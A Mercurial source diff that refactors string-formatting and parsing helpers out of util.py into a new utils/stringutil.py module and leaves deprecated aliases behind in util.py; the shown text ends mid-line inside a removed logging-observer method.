diff --git a/mercurial/util.py b/mercurial/util.py --- a/mercurial/util.py +++ b/mercurial/util.py @@ -17,7 +17,6 @@ from __future__ import absolute_import, import abc import bz2 -import codecs import collections import contextlib import errno @@ -37,7 +36,6 @@ import stat import subprocess import sys import tempfile -import textwrap import time import traceback import warnings @@ -52,7 +50,10 @@ from . import ( pycompat, urllibcompat, ) -from .utils import dateutil +from .utils import ( + dateutil, + stringutil, +) base85 = policy.importmod(r'base85') osutil = policy.importmod(r'osutil') @@ -808,20 +809,6 @@ class socketproxy(object): return object.__getattribute__(self, r'_observedcall')( r'setsockopt', *args, **kwargs) -_DATA_ESCAPE_MAP = {pycompat.bytechr(i): br'\x%02x' % i for i in range(256)} -_DATA_ESCAPE_MAP.update({ - b'\\': b'\\\\', - b'\r': br'\r', - b'\n': br'\n', -}) -_DATA_ESCAPE_RE = remod.compile(br'[\x00-\x08\x0a-\x1f\\\x7f-\xff]') - -def escapedata(s): - if isinstance(s, bytearray): - s = bytes(s) - - return _DATA_ESCAPE_RE.sub(lambda m: _DATA_ESCAPE_MAP[m.group(0)], s) - class baseproxyobserver(object): def _writedata(self, data): if not self.logdata: @@ -1567,10 +1554,6 @@ def filter(s, cmd): return fn(s, cmd[len(name):].lstrip()) return pipefilter(s, cmd) -def binary(s): - """return true if a string is binary data""" - return bool(s and '\0' in s) - def increasingchunks(source, min=1024, max=65536): '''return no less than min bytes per chunk while data remains, doubling min after each chunk until it reaches max''' @@ -2571,102 +2554,6 @@ class cappedreader(object): b[0:len(res)] = res return len(res) -def stringmatcher(pattern, casesensitive=True): - """ - accepts a string, possibly starting with 're:' or 'literal:' prefix. - returns the matcher name, pattern, and matcher function. - missing or unknown prefixes are treated as literal matches. - - helper for tests: - >>> def test(pattern, *tests): - ... kind, pattern, matcher = stringmatcher(pattern) - ... return (kind, pattern, [bool(matcher(t)) for t in tests]) - >>> def itest(pattern, *tests): - ... kind, pattern, matcher = stringmatcher(pattern, casesensitive=False) - ... return (kind, pattern, [bool(matcher(t)) for t in tests]) - - exact matching (no prefix): - >>> test(b'abcdefg', b'abc', b'def', b'abcdefg') - ('literal', 'abcdefg', [False, False, True]) - - regex matching ('re:' prefix) - >>> test(b're:a.+b', b'nomatch', b'fooadef', b'fooadefbar') - ('re', 'a.+b', [False, False, True]) - - force exact matches ('literal:' prefix) - >>> test(b'literal:re:foobar', b'foobar', b're:foobar') - ('literal', 're:foobar', [False, True]) - - unknown prefixes are ignored and treated as literals - >>> test(b'foo:bar', b'foo', b'bar', b'foo:bar') - ('literal', 'foo:bar', [False, False, True]) - - case insensitive regex matches - >>> itest(b're:A.+b', b'nomatch', b'fooadef', b'fooadefBar') - ('re', 'A.+b', [False, False, True]) - - case insensitive literal matches - >>> itest(b'ABCDEFG', b'abc', b'def', b'abcdefg') - ('literal', 'ABCDEFG', [False, False, True]) - """ - if pattern.startswith('re:'): - pattern = pattern[3:] - try: - flags = 0 - if not casesensitive: - flags = remod.I - regex = remod.compile(pattern, flags) - except remod.error as e: - raise error.ParseError(_('invalid regular expression: %s') - % e) - return 're', pattern, regex.search - elif pattern.startswith('literal:'): - pattern = pattern[8:] - - match = pattern.__eq__ - - if not casesensitive: - ipat = encoding.lower(pattern) - match = lambda s: ipat == encoding.lower(s) - return 'literal', pattern, match - -def shortuser(user): - """Return a short representation of a user name or email address.""" - f = user.find('@') - if f >= 0: - user = user[:f] - f = user.find('<') - if f >= 0: - user = user[f + 1:] - f = user.find(' ') - if f >= 0: - user = user[:f] - f = user.find('.') - if f >= 0: - user = user[:f] - return user - -def emailuser(user): - """Return the user portion of an email address.""" - f = user.find('@') - if f >= 0: - user = user[:f] - f = user.find('<') - if f >= 0: - user = user[f + 1:] - return user - -def email(author): - '''get email of author.''' - r = author.find('>') - if r == -1: - r = None - return author[author.find('<') + 1:r] - -def ellipsis(text, maxlength=400): - """Trim string to at most maxlength (default: 400) columns in display.""" - return encoding.trim(text, maxlength, ellipsis='...') - def unitcountfn(*unittable): '''return a function that renders a readable count of some quantity''' @@ -2751,147 +2638,6 @@ else: fromnativeeol = pycompat.identity nativeeolwriter = pycompat.identity -def escapestr(s): - # call underlying function of s.encode('string_escape') directly for - # Python 3 compatibility - return codecs.escape_encode(s)[0] - -def unescapestr(s): - return codecs.escape_decode(s)[0] - -def forcebytestr(obj): - """Portably format an arbitrary object (e.g. exception) into a byte - string.""" - try: - return pycompat.bytestr(obj) - except UnicodeEncodeError: - # non-ascii string, may be lossy - return pycompat.bytestr(encoding.strtolocal(str(obj))) - -def uirepr(s): - # Avoid double backslash in Windows path repr() - return pycompat.byterepr(pycompat.bytestr(s)).replace(b'\\\\', b'\\') - -# delay import of textwrap -def _MBTextWrapper(**kwargs): - class tw(textwrap.TextWrapper): - """ - Extend TextWrapper for width-awareness. - - Neither number of 'bytes' in any encoding nor 'characters' is - appropriate to calculate terminal columns for specified string. - - Original TextWrapper implementation uses built-in 'len()' directly, - so overriding is needed to use width information of each characters. - - In addition, characters classified into 'ambiguous' width are - treated as wide in East Asian area, but as narrow in other. - - This requires use decision to determine width of such characters. - """ - def _cutdown(self, ucstr, space_left): - l = 0 - colwidth = encoding.ucolwidth - for i in xrange(len(ucstr)): - l += colwidth(ucstr[i]) - if space_left < l: - return (ucstr[:i], ucstr[i:]) - return ucstr, '' - - # overriding of base class - def _handle_long_word(self, reversed_chunks, cur_line, cur_len, width): - space_left = max(width - cur_len, 1) - - if self.break_long_words: - cut, res = self._cutdown(reversed_chunks[-1], space_left) - cur_line.append(cut) - reversed_chunks[-1] = res - elif not cur_line: - cur_line.append(reversed_chunks.pop()) - - # this overriding code is imported from TextWrapper of Python 2.6 - # to calculate columns of string by 'encoding.ucolwidth()' - def _wrap_chunks(self, chunks): - colwidth = encoding.ucolwidth - - lines = [] - if self.width <= 0: - raise ValueError("invalid width %r (must be > 0)" % self.width) - - # Arrange in reverse order so items can be efficiently popped - # from a stack of chucks. - chunks.reverse() - - while chunks: - - # Start the list of chunks that will make up the current line. - # cur_len is just the length of all the chunks in cur_line. - cur_line = [] - cur_len = 0 - - # Figure out which static string will prefix this line. - if lines: - indent = self.subsequent_indent - else: - indent = self.initial_indent - - # Maximum width for this line. - width = self.width - len(indent) - - # First chunk on line is whitespace -- drop it, unless this - # is the very beginning of the text (i.e. no lines started yet). - if self.drop_whitespace and chunks[-1].strip() == r'' and lines: - del chunks[-1] - - while chunks: - l = colwidth(chunks[-1]) - - # Can at least squeeze this chunk onto the current line. - if cur_len + l <= width: - cur_line.append(chunks.pop()) - cur_len += l - - # Nope, this line is full. - else: - break - - # The current line is full, and the next chunk is too big to - # fit on *any* line (not just this one). - if chunks and colwidth(chunks[-1]) > width: - self._handle_long_word(chunks, cur_line, cur_len, width) - - # If the last chunk on this line is all whitespace, drop it. - if (self.drop_whitespace and - cur_line and cur_line[-1].strip() == r''): - del cur_line[-1] - - # Convert current line back to a string and store it in list - # of all lines (return value). - if cur_line: - lines.append(indent + r''.join(cur_line)) - - return lines - - global _MBTextWrapper - _MBTextWrapper = tw - return tw(**kwargs) - -def wrap(line, width, initindent='', hangindent=''): - maxindent = max(len(hangindent), len(initindent)) - if width <= maxindent: - # adjust for weird terminal size - width = max(78, maxindent + 1) - line = line.decode(pycompat.sysstr(encoding.encoding), - pycompat.sysstr(encoding.encodingmode)) - initindent = initindent.decode(pycompat.sysstr(encoding.encoding), - pycompat.sysstr(encoding.encodingmode)) - hangindent = hangindent.decode(pycompat.sysstr(encoding.encoding), - pycompat.sysstr(encoding.encodingmode)) - wrapper = _MBTextWrapper(width=width, - initial_indent=initindent, - subsequent_indent=hangindent) - return wrapper.fill(line).encode(pycompat.sysstr(encoding.encoding)) - if (pyplatform.python_implementation() == 'CPython' and sys.version_info < (3, 0)): # There is an issue in CPython that some IO methods do not handle EINTR @@ -3064,17 +2810,6 @@ def getport(port): except socket.error: raise Abort(_("no port number associated with service '%s'") % port) -_booleans = {'1': True, 'yes': True, 'true': True, 'on': True, 'always': True, - '0': False, 'no': False, 'false': False, 'off': False, - 'never': False} - -def parsebool(s): - """Parse s into a boolean. - - If s is not a valid boolean, returns None. - """ - return _booleans.get(s.lower(), None) - class url(object): r"""Reliable URL parser. @@ -4341,3 +4076,19 @@ parsetimezone = _deprecatedfunc(dateutil strdate = _deprecatedfunc(dateutil.strdate, '4.6') parsedate = _deprecatedfunc(dateutil.parsedate, '4.6') matchdate = _deprecatedfunc(dateutil.matchdate, '4.6') + +def _deprecatedfunc(func, version): # TODO + return func +escapedata = _deprecatedfunc(stringutil.escapedata, '4.6') +binary = _deprecatedfunc(stringutil.binary, '4.6') +stringmatcher = _deprecatedfunc(stringutil.stringmatcher, '4.6') +shortuser = _deprecatedfunc(stringutil.shortuser, '4.6') +emailuser = _deprecatedfunc(stringutil.emailuser, '4.6') +email = _deprecatedfunc(stringutil.email, '4.6') +ellipsis = _deprecatedfunc(stringutil.ellipsis, '4.6') +escapestr = _deprecatedfunc(stringutil.escapestr, '4.6') +unescapestr = _deprecatedfunc(stringutil.unescapestr, '4.6') +forcebytestr = _deprecatedfunc(stringutil.forcebytestr, '4.6') +uirepr = _deprecatedfunc(stringutil.uirepr, '4.6') +wrap = _deprecatedfunc(stringutil.wrap, '4.6') +parsebool = _deprecatedfunc(stringutil.parsebool, '4.6') diff --git a/mercurial/util.py b/mercurial/utils/stringutil.py copy from mercurial/util.py copy to mercurial/utils/stringutil.py --- a/mercurial/util.py +++ b/mercurial/utils/stringutil.py @@ -1,4 +1,4 @@ -# util.py - Mercurial utility functions and platform specific implementations +# stringutil.py - utility for generic string formatting, parsing, etc. # # Copyright 2005 K. Thananchayan # Copyright 2005-2007 Matt Mackall @@ -7,806 +7,19 @@ # This software may be used and distributed according to the terms of the # GNU General Public License version 2 or any later version. -"""Mercurial utility functions and platform specific implementations. +from __future__ import absolute_import -This contains helper routines that are independent of the SCM core and -hide platform-specific details from the core. -""" - -from __future__ import absolute_import, print_function - -import abc -import bz2 import codecs -import collections -import contextlib -import errno -import gc -import hashlib -import imp -import io -import itertools -import mmap -import os -import platform as pyplatform import re as remod -import shutil -import signal -import socket -import stat -import subprocess -import sys -import tempfile import textwrap -import time -import traceback -import warnings -import zlib -from . import ( +from ..i18n import _ + +from .. import ( encoding, error, - i18n, - node as nodemod, - policy, pycompat, - urllibcompat, ) -from .utils import dateutil - -base85 = policy.importmod(r'base85') -osutil = policy.importmod(r'osutil') -parsers = policy.importmod(r'parsers') - -b85decode = base85.b85decode -b85encode = base85.b85encode - -cookielib = pycompat.cookielib -empty = pycompat.empty -httplib = pycompat.httplib -pickle = pycompat.pickle -queue = pycompat.queue -socketserver = pycompat.socketserver -stderr = pycompat.stderr -stdin = pycompat.stdin -stdout = pycompat.stdout -bytesio = pycompat.bytesio -# TODO deprecate stringio name, as it is a lie on Python 3. -stringio = bytesio -xmlrpclib = pycompat.xmlrpclib - -httpserver = urllibcompat.httpserver -urlerr = urllibcompat.urlerr -urlreq = urllibcompat.urlreq - -# workaround for win32mbcs -_filenamebytestr = pycompat.bytestr - -def isatty(fp): - try: - return fp.isatty() - except AttributeError: - return False - -# glibc determines buffering on first write to stdout - if we replace a TTY -# destined stdout with a pipe destined stdout (e.g. pager), we want line -# buffering -if isatty(stdout): - stdout = os.fdopen(stdout.fileno(), r'wb', 1) - -if pycompat.iswindows: - from . import windows as platform - stdout = platform.winstdout(stdout) -else: - from . import posix as platform - -_ = i18n._ - -bindunixsocket = platform.bindunixsocket -cachestat = platform.cachestat -checkexec = platform.checkexec -checklink = platform.checklink -copymode = platform.copymode -executablepath = platform.executablepath -expandglobs = platform.expandglobs -explainexit = platform.explainexit -findexe = platform.findexe -getfsmountpoint = platform.getfsmountpoint -getfstype = platform.getfstype -gethgcmd = platform.gethgcmd -getuser = platform.getuser -getpid = os.getpid -groupmembers = platform.groupmembers -groupname = platform.groupname -hidewindow = platform.hidewindow -isexec = platform.isexec -isowner = platform.isowner -listdir = osutil.listdir -localpath = platform.localpath -lookupreg = platform.lookupreg -makedir = platform.makedir -nlinks = platform.nlinks -normpath = platform.normpath -normcase = platform.normcase -normcasespec = platform.normcasespec -normcasefallback = platform.normcasefallback -openhardlinks = platform.openhardlinks -oslink = platform.oslink -parsepatchoutput = platform.parsepatchoutput -pconvert = platform.pconvert -poll = platform.poll -popen = platform.popen -posixfile = platform.posixfile -quotecommand = platform.quotecommand -readpipe = platform.readpipe -rename = platform.rename -removedirs = platform.removedirs -samedevice = platform.samedevice -samefile = platform.samefile -samestat = platform.samestat -setbinary = platform.setbinary -setflags = platform.setflags -setsignalhandler = platform.setsignalhandler -shellquote = platform.shellquote -shellsplit = platform.shellsplit -spawndetached = platform.spawndetached -split = platform.split -sshargs = platform.sshargs -statfiles = getattr(osutil, 'statfiles', platform.statfiles) -statisexec = platform.statisexec -statislink = platform.statislink -testpid = platform.testpid -umask = platform.umask -unlink = platform.unlink -username = platform.username - -try: - recvfds = osutil.recvfds -except AttributeError: - pass -try: - setprocname = osutil.setprocname -except AttributeError: - pass -try: - unblocksignal = osutil.unblocksignal -except AttributeError: - pass - -# Python compatibility - -_notset = object() - -def safehasattr(thing, attr): - return getattr(thing, attr, _notset) is not _notset - -def _rapply(f, xs): - if xs is None: - # assume None means non-value of optional data - return xs - if isinstance(xs, (list, set, tuple)): - return type(xs)(_rapply(f, x) for x in xs) - if isinstance(xs, dict): - return type(xs)((_rapply(f, k), _rapply(f, v)) for k, v in xs.items()) - return f(xs) - -def rapply(f, xs): - """Apply function recursively to every item preserving the data structure - - >>> def f(x): - ... return 'f(%s)' % x - >>> rapply(f, None) is None - True - >>> rapply(f, 'a') - 'f(a)' - >>> rapply(f, {'a'}) == {'f(a)'} - True - >>> rapply(f, ['a', 'b', None, {'c': 'd'}, []]) - ['f(a)', 'f(b)', None, {'f(c)': 'f(d)'}, []] - - >>> xs = [object()] - >>> rapply(pycompat.identity, xs) is xs - True - """ - if f is pycompat.identity: - # fast path mainly for py2 - return xs - return _rapply(f, xs) - -def bitsfrom(container): - bits = 0 - for bit in container: - bits |= bit - return bits - -# python 2.6 still have deprecation warning enabled by default. We do not want -# to display anything to standard user so detect if we are running test and -# only use python deprecation warning in this case. -_dowarn = bool(encoding.environ.get('HGEMITWARNINGS')) -if _dowarn: - # explicitly unfilter our warning for python 2.7 - # - # The option of setting PYTHONWARNINGS in the test runner was investigated. - # However, module name set through PYTHONWARNINGS was exactly matched, so - # we cannot set 'mercurial' and have it match eg: 'mercurial.scmutil'. This - # makes the whole PYTHONWARNINGS thing useless for our usecase. - warnings.filterwarnings(r'default', r'', DeprecationWarning, r'mercurial') - warnings.filterwarnings(r'default', r'', DeprecationWarning, r'hgext') - warnings.filterwarnings(r'default', r'', DeprecationWarning, r'hgext3rd') -if _dowarn and pycompat.ispy3: - # silence warning emitted by passing user string to re.sub() - warnings.filterwarnings(r'ignore', r'bad escape', DeprecationWarning, - r'mercurial') - warnings.filterwarnings(r'ignore', r'invalid escape sequence', - DeprecationWarning, r'mercurial') - -def nouideprecwarn(msg, version, stacklevel=1): - """Issue an python native deprecation warning - - This is a noop outside of tests, use 'ui.deprecwarn' when possible. - """ - if _dowarn: - msg += ("\n(compatibility will be dropped after Mercurial-%s," - " update your code.)") % version - warnings.warn(pycompat.sysstr(msg), DeprecationWarning, stacklevel + 1) - -DIGESTS = { - 'md5': hashlib.md5, - 'sha1': hashlib.sha1, - 'sha512': hashlib.sha512, -} -# List of digest types from strongest to weakest -DIGESTS_BY_STRENGTH = ['sha512', 'sha1', 'md5'] - -for k in DIGESTS_BY_STRENGTH: - assert k in DIGESTS - -class digester(object): - """helper to compute digests. - - This helper can be used to compute one or more digests given their name. - - >>> d = digester([b'md5', b'sha1']) - >>> d.update(b'foo') - >>> [k for k in sorted(d)] - ['md5', 'sha1'] - >>> d[b'md5'] - 'acbd18db4cc2f85cedef654fccc4a4d8' - >>> d[b'sha1'] - '0beec7b5ea3f0fdbc95d0dd47f3c5bc275da8a33' - >>> digester.preferred([b'md5', b'sha1']) - 'sha1' - """ - - def __init__(self, digests, s=''): - self._hashes = {} - for k in digests: - if k not in DIGESTS: - raise Abort(_('unknown digest type: %s') % k) - self._hashes[k] = DIGESTS[k]() - if s: - self.update(s) - - def update(self, data): - for h in self._hashes.values(): - h.update(data) - - def __getitem__(self, key): - if key not in DIGESTS: - raise Abort(_('unknown digest type: %s') % k) - return nodemod.hex(self._hashes[key].digest()) - - def __iter__(self): - return iter(self._hashes) - - @staticmethod - def preferred(supported): - """returns the strongest digest type in both supported and DIGESTS.""" - - for k in DIGESTS_BY_STRENGTH: - if k in supported: - return k - return None - -class digestchecker(object): - """file handle wrapper that additionally checks content against a given - size and digests. - - d = digestchecker(fh, size, {'md5': '...'}) - - When multiple digests are given, all of them are validated. - """ - - def __init__(self, fh, size, digests): - self._fh = fh - self._size = size - self._got = 0 - self._digests = dict(digests) - self._digester = digester(self._digests.keys()) - - def read(self, length=-1): - content = self._fh.read(length) - self._digester.update(content) - self._got += len(content) - return content - - def validate(self): - if self._size != self._got: - raise Abort(_('size mismatch: expected %d, got %d') % - (self._size, self._got)) - for k, v in self._digests.items(): - if v != self._digester[k]: - # i18n: first parameter is a digest name - raise Abort(_('%s mismatch: expected %s, got %s') % - (k, v, self._digester[k])) - -try: - buffer = buffer -except NameError: - def buffer(sliceable, offset=0, length=None): - if length is not None: - return memoryview(sliceable)[offset:offset + length] - return memoryview(sliceable)[offset:] - -closefds = pycompat.isposix - -_chunksize = 4096 - -class bufferedinputpipe(object): - """a manually buffered input pipe - - Python will not let us use buffered IO and lazy reading with 'polling' at - the same time. We cannot probe the buffer state and select will not detect - that data are ready to read if they are already buffered. - - This class let us work around that by implementing its own buffering - (allowing efficient readline) while offering a way to know if the buffer is - empty from the output (allowing collaboration of the buffer with polling). - - This class lives in the 'util' module because it makes use of the 'os' - module from the python stdlib. - """ - def __new__(cls, fh): - # If we receive a fileobjectproxy, we need to use a variation of this - # class that notifies observers about activity. - if isinstance(fh, fileobjectproxy): - cls = observedbufferedinputpipe - - return super(bufferedinputpipe, cls).__new__(cls) - - def __init__(self, input): - self._input = input - self._buffer = [] - self._eof = False - self._lenbuf = 0 - - @property - def hasbuffer(self): - """True is any data is currently buffered - - This will be used externally a pre-step for polling IO. If there is - already data then no polling should be set in place.""" - return bool(self._buffer) - - @property - def closed(self): - return self._input.closed - - def fileno(self): - return self._input.fileno() - - def close(self): - return self._input.close() - - def read(self, size): - while (not self._eof) and (self._lenbuf < size): - self._fillbuffer() - return self._frombuffer(size) - - def readline(self, *args, **kwargs): - if 1 < len(self._buffer): - # this should not happen because both read and readline end with a - # _frombuffer call that collapse it. - self._buffer = [''.join(self._buffer)] - self._lenbuf = len(self._buffer[0]) - lfi = -1 - if self._buffer: - lfi = self._buffer[-1].find('\n') - while (not self._eof) and lfi < 0: - self._fillbuffer() - if self._buffer: - lfi = self._buffer[-1].find('\n') - size = lfi + 1 - if lfi < 0: # end of file - size = self._lenbuf - elif 1 < len(self._buffer): - # we need to take previous chunks into account - size += self._lenbuf - len(self._buffer[-1]) - return self._frombuffer(size) - - def _frombuffer(self, size): - """return at most 'size' data from the buffer - - The data are removed from the buffer.""" - if size == 0 or not self._buffer: - return '' - buf = self._buffer[0] - if 1 < len(self._buffer): - buf = ''.join(self._buffer) - - data = buf[:size] - buf = buf[len(data):] - if buf: - self._buffer = [buf] - self._lenbuf = len(buf) - else: - self._buffer = [] - self._lenbuf = 0 - return data - - def _fillbuffer(self): - """read data to the buffer""" - data = os.read(self._input.fileno(), _chunksize) - if not data: - self._eof = True - else: - self._lenbuf += len(data) - self._buffer.append(data) - - return data - -def mmapread(fp): - try: - fd = getattr(fp, 'fileno', lambda: fp)() - return mmap.mmap(fd, 0, access=mmap.ACCESS_READ) - except ValueError: - # Empty files cannot be mmapped, but mmapread should still work. Check - # if the file is empty, and if so, return an empty buffer. - if os.fstat(fd).st_size == 0: - return '' - raise - -def popen2(cmd, env=None, newlines=False): - # Setting bufsize to -1 lets the system decide the buffer size. - # The default for bufsize is 0, meaning unbuffered. This leads to - # poor performance on Mac OS X: http://bugs.python.org/issue4194 - p = subprocess.Popen(cmd, shell=True, bufsize=-1, - close_fds=closefds, - stdin=subprocess.PIPE, stdout=subprocess.PIPE, - universal_newlines=newlines, - env=env) - return p.stdin, p.stdout - -def popen3(cmd, env=None, newlines=False): - stdin, stdout, stderr, p = popen4(cmd, env, newlines) - return stdin, stdout, stderr - -def popen4(cmd, env=None, newlines=False, bufsize=-1): - p = subprocess.Popen(cmd, shell=True, bufsize=bufsize, - close_fds=closefds, - stdin=subprocess.PIPE, stdout=subprocess.PIPE, - stderr=subprocess.PIPE, - universal_newlines=newlines, - env=env) - return p.stdin, p.stdout, p.stderr, p - -class fileobjectproxy(object): - """A proxy around file objects that tells a watcher when events occur. - - This type is intended to only be used for testing purposes. Think hard - before using it in important code. - """ - __slots__ = ( - r'_orig', - r'_observer', - ) - - def __init__(self, fh, observer): - object.__setattr__(self, r'_orig', fh) - object.__setattr__(self, r'_observer', observer) - - def __getattribute__(self, name): - ours = { - r'_observer', - - # IOBase - r'close', - # closed if a property - r'fileno', - r'flush', - r'isatty', - r'readable', - r'readline', - r'readlines', - r'seek', - r'seekable', - r'tell', - r'truncate', - r'writable', - r'writelines', - # RawIOBase - r'read', - r'readall', - r'readinto', - r'write', - # BufferedIOBase - # raw is a property - r'detach', - # read defined above - r'read1', - # readinto defined above - # write defined above - } - - # We only observe some methods. - if name in ours: - return object.__getattribute__(self, name) - - return getattr(object.__getattribute__(self, r'_orig'), name) - - def __nonzero__(self): - return bool(object.__getattribute__(self, r'_orig')) - - __bool__ = __nonzero__ - - def __delattr__(self, name): - return delattr(object.__getattribute__(self, r'_orig'), name) - - def __setattr__(self, name, value): - return setattr(object.__getattribute__(self, r'_orig'), name, value) - - def __iter__(self): - return object.__getattribute__(self, r'_orig').__iter__() - - def _observedcall(self, name, *args, **kwargs): - # Call the original object. - orig = object.__getattribute__(self, r'_orig') - res = getattr(orig, name)(*args, **kwargs) - - # Call a method on the observer of the same name with arguments - # so it can react, log, etc. - observer = object.__getattribute__(self, r'_observer') - fn = getattr(observer, name, None) - if fn: - fn(res, *args, **kwargs) - - return res - - def close(self, *args, **kwargs): - return object.__getattribute__(self, r'_observedcall')( - r'close', *args, **kwargs) - - def fileno(self, *args, **kwargs): - return object.__getattribute__(self, r'_observedcall')( - r'fileno', *args, **kwargs) - - def flush(self, *args, **kwargs): - return object.__getattribute__(self, r'_observedcall')( - r'flush', *args, **kwargs) - - def isatty(self, *args, **kwargs): - return object.__getattribute__(self, r'_observedcall')( - r'isatty', *args, **kwargs) - - def readable(self, *args, **kwargs): - return object.__getattribute__(self, r'_observedcall')( - r'readable', *args, **kwargs) - - def readline(self, *args, **kwargs): - return object.__getattribute__(self, r'_observedcall')( - r'readline', *args, **kwargs) - - def readlines(self, *args, **kwargs): - return object.__getattribute__(self, r'_observedcall')( - r'readlines', *args, **kwargs) - - def seek(self, *args, **kwargs): - return object.__getattribute__(self, r'_observedcall')( - r'seek', *args, **kwargs) - - def seekable(self, *args, **kwargs): - return object.__getattribute__(self, r'_observedcall')( - r'seekable', *args, **kwargs) - - def tell(self, *args, **kwargs): - return object.__getattribute__(self, r'_observedcall')( - r'tell', *args, **kwargs) - - def truncate(self, *args, **kwargs): - return object.__getattribute__(self, r'_observedcall')( - r'truncate', *args, **kwargs) - - def writable(self, *args, **kwargs): - return object.__getattribute__(self, r'_observedcall')( - r'writable', *args, **kwargs) - - def writelines(self, *args, **kwargs): - return object.__getattribute__(self, r'_observedcall')( - r'writelines', *args, **kwargs) - - def read(self, *args, **kwargs): - return object.__getattribute__(self, r'_observedcall')( - r'read', *args, **kwargs) - - def readall(self, *args, **kwargs): - return object.__getattribute__(self, r'_observedcall')( - r'readall', *args, **kwargs) - - def readinto(self, *args, **kwargs): - return object.__getattribute__(self, r'_observedcall')( - r'readinto', *args, **kwargs) - - def write(self, *args, **kwargs): - return object.__getattribute__(self, r'_observedcall')( - r'write', *args, **kwargs) - - def detach(self, *args, **kwargs): - return object.__getattribute__(self, r'_observedcall')( - r'detach', *args, **kwargs) - - def read1(self, *args, **kwargs): - return object.__getattribute__(self, r'_observedcall')( - r'read1', *args, **kwargs) - -class observedbufferedinputpipe(bufferedinputpipe): - """A variation of bufferedinputpipe that is aware of fileobjectproxy. - - ``bufferedinputpipe`` makes low-level calls to ``os.read()`` that - bypass ``fileobjectproxy``. Because of this, we need to make - ``bufferedinputpipe`` aware of these operations. - - This variation of ``bufferedinputpipe`` can notify observers about - ``os.read()`` events. It also re-publishes other events, such as - ``read()`` and ``readline()``. - """ - def _fillbuffer(self): - res = super(observedbufferedinputpipe, self)._fillbuffer() - - fn = getattr(self._input._observer, r'osread', None) - if fn: - fn(res, _chunksize) - - return res - - # We use different observer methods because the operation isn't - # performed on the actual file object but on us. - def read(self, size): - res = super(observedbufferedinputpipe, self).read(size) - - fn = getattr(self._input._observer, r'bufferedread', None) - if fn: - fn(res, size) - - return res - - def readline(self, *args, **kwargs): - res = super(observedbufferedinputpipe, self).readline(*args, **kwargs) - - fn = getattr(self._input._observer, r'bufferedreadline', None) - if fn: - fn(res) - - return res - -PROXIED_SOCKET_METHODS = { - r'makefile', - r'recv', - r'recvfrom', - r'recvfrom_into', - r'recv_into', - r'send', - r'sendall', - r'sendto', - r'setblocking', - r'settimeout', - r'gettimeout', - r'setsockopt', -} - -class socketproxy(object): - """A proxy around a socket that tells a watcher when events occur. - - This is like ``fileobjectproxy`` except for sockets. - - This type is intended to only be used for testing purposes. Think hard - before using it in important code. - """ - __slots__ = ( - r'_orig', - r'_observer', - ) - - def __init__(self, sock, observer): - object.__setattr__(self, r'_orig', sock) - object.__setattr__(self, r'_observer', observer) - - def __getattribute__(self, name): - if name in PROXIED_SOCKET_METHODS: - return object.__getattribute__(self, name) - - return getattr(object.__getattribute__(self, r'_orig'), name) - - def __delattr__(self, name): - return delattr(object.__getattribute__(self, r'_orig'), name) - - def __setattr__(self, name, value): - return setattr(object.__getattribute__(self, r'_orig'), name, value) - - def __nonzero__(self): - return bool(object.__getattribute__(self, r'_orig')) - - __bool__ = __nonzero__ - - def _observedcall(self, name, *args, **kwargs): - # Call the original object. - orig = object.__getattribute__(self, r'_orig') - res = getattr(orig, name)(*args, **kwargs) - - # Call a method on the observer of the same name with arguments - # so it can react, log, etc. - observer = object.__getattribute__(self, r'_observer') - fn = getattr(observer, name, None) - if fn: - fn(res, *args, **kwargs) - - return res - - def makefile(self, *args, **kwargs): - res = object.__getattribute__(self, r'_observedcall')( - r'makefile', *args, **kwargs) - - # The file object may be used for I/O. So we turn it into a - # proxy using our observer. - observer = object.__getattribute__(self, r'_observer') - return makeloggingfileobject(observer.fh, res, observer.name, - reads=observer.reads, - writes=observer.writes, - logdata=observer.logdata, - logdataapis=observer.logdataapis) - - def recv(self, *args, **kwargs): - return object.__getattribute__(self, r'_observedcall')( - r'recv', *args, **kwargs) - - def recvfrom(self, *args, **kwargs): - return object.__getattribute__(self, r'_observedcall')( - r'recvfrom', *args, **kwargs) - - def recvfrom_into(self, *args, **kwargs): - return object.__getattribute__(self, r'_observedcall')( - r'recvfrom_into', *args, **kwargs) - - def recv_into(self, *args, **kwargs): - return object.__getattribute__(self, r'_observedcall')( - r'recv_info', *args, **kwargs) - - def send(self, *args, **kwargs): - return object.__getattribute__(self, r'_observedcall')( - r'send', *args, **kwargs) - - def sendall(self, *args, **kwargs): - return object.__getattribute__(self, r'_observedcall')( - r'sendall', *args, **kwargs) - - def sendto(self, *args, **kwargs): - return object.__getattribute__(self, r'_observedcall')( - r'sendto', *args, **kwargs) - - def setblocking(self, *args, **kwargs): - return object.__getattribute__(self, r'_observedcall')( - r'setblocking', *args, **kwargs) - - def settimeout(self, *args, **kwargs): - return object.__getattribute__(self, r'_observedcall')( - r'settimeout', *args, **kwargs) - - def gettimeout(self, *args, **kwargs): - return object.__getattribute__(self, r'_observedcall')( - r'gettimeout', *args, **kwargs) - - def setsockopt(self, *args, **kwargs): - return object.__getattribute__(self, r'_observedcall')( - r'setsockopt', *args, **kwargs) _DATA_ESCAPE_MAP = {pycompat.bytechr(i): br'\x%02x' % i for i in range(256)} _DATA_ESCAPE_MAP.update({ @@ -822,1755 +35,10 @@ def escapedata(s): return _DATA_ESCAPE_RE.sub(lambda m: _DATA_ESCAPE_MAP[m.group(0)], s) -class baseproxyobserver(object): - def _writedata(self, data): - if not self.logdata: - if self.logdataapis: - self.fh.write('\n') - self.fh.flush() - return - - # Simple case writes all data on a single line. - if b'\n' not in data: - if self.logdataapis: - self.fh.write(': %s\n' % escapedata(data)) - else: - self.fh.write('%s> %s\n' % (self.name, escapedata(data))) - self.fh.flush() - return - - # Data with newlines is written to multiple lines. - if self.logdataapis: - self.fh.write(':\n') - - lines = data.splitlines(True) - for line in lines: - self.fh.write('%s> %s\n' % (self.name, escapedata(line))) - self.fh.flush() - -class fileobjectobserver(baseproxyobserver): - """Logs file object activity.""" - def __init__(self, fh, name, reads=True, writes=True, logdata=False, - logdataapis=True): - self.fh = fh - self.name = name - self.logdata = logdata - self.logdataapis = logdataapis - self.reads = reads - self.writes = writes - - def read(self, res, size=-1): - if not self.reads: - return - # Python 3 can return None from reads at EOF instead of empty strings. - if res is None: - res = '' - - if self.logdataapis: - self.fh.write('%s> read(%d) -> %d' % (self.name, size, len(res))) - - self._writedata(res) - - def readline(self, res, limit=-1): - if not self.reads: - return - - if self.logdataapis: - self.fh.write('%s> readline() -> %d' % (self.name, len(res))) - - self._writedata(res) - - def readinto(self, res, dest): - if not self.reads: - return - - if self.logdataapis: - self.fh.write('%s> readinto(%d) -> %r' % 